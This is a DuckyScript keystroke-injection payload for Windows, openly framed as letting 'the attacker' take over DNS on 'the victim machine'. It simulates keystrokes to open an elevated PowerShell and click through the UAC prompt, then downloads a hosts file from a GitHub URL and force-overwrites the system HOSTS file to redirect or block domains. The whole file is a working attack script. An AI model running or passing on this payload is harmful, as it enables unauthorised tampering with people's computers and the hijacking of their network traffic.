REM Author: REDD (InfoSecREDD)
REM Version: 0.12
REM Category: Execution
REM Target: All Windows
REM --- --- --- ---
REM This payload allows the attacker to take over DNS settings of the victim machine. (DNS Poisoning)
REM -REDD
DELAY 500
GUI d
DELAY 500
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 4000
LEFTARROW
DELAY 500
ENTER
DELAY 560
REM *************************************************
REM **   Deny all Social Media Websites
REM ** ==================================
REM ** https://raw.githubusercontent.com/InfoSecREDD/REDD-Demo/main/DNS-POI/killsocials.lst
REM **
REM **   DEFAULT Microsoft Hosts File
REM ** ==================================
REM ** https://raw.githubusercontent.com/InfoSecREDD/REDD-Demo/main/DNS-POI/HOSTS
REM *************************************************
REM  - Change the URI to the correct path.

STRING cd $Env:temp;Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/InfoSecREDD/REDD-Demo/main/DNS-POI/killsocials.lst' -OutFile 'HOSTS';Copy-Item 'HOSTS' -Destination 'C:\Windows\System32\drivers\etc\HOSTS' -Recurse -force;
ENTER
DELAY 500
GUI d
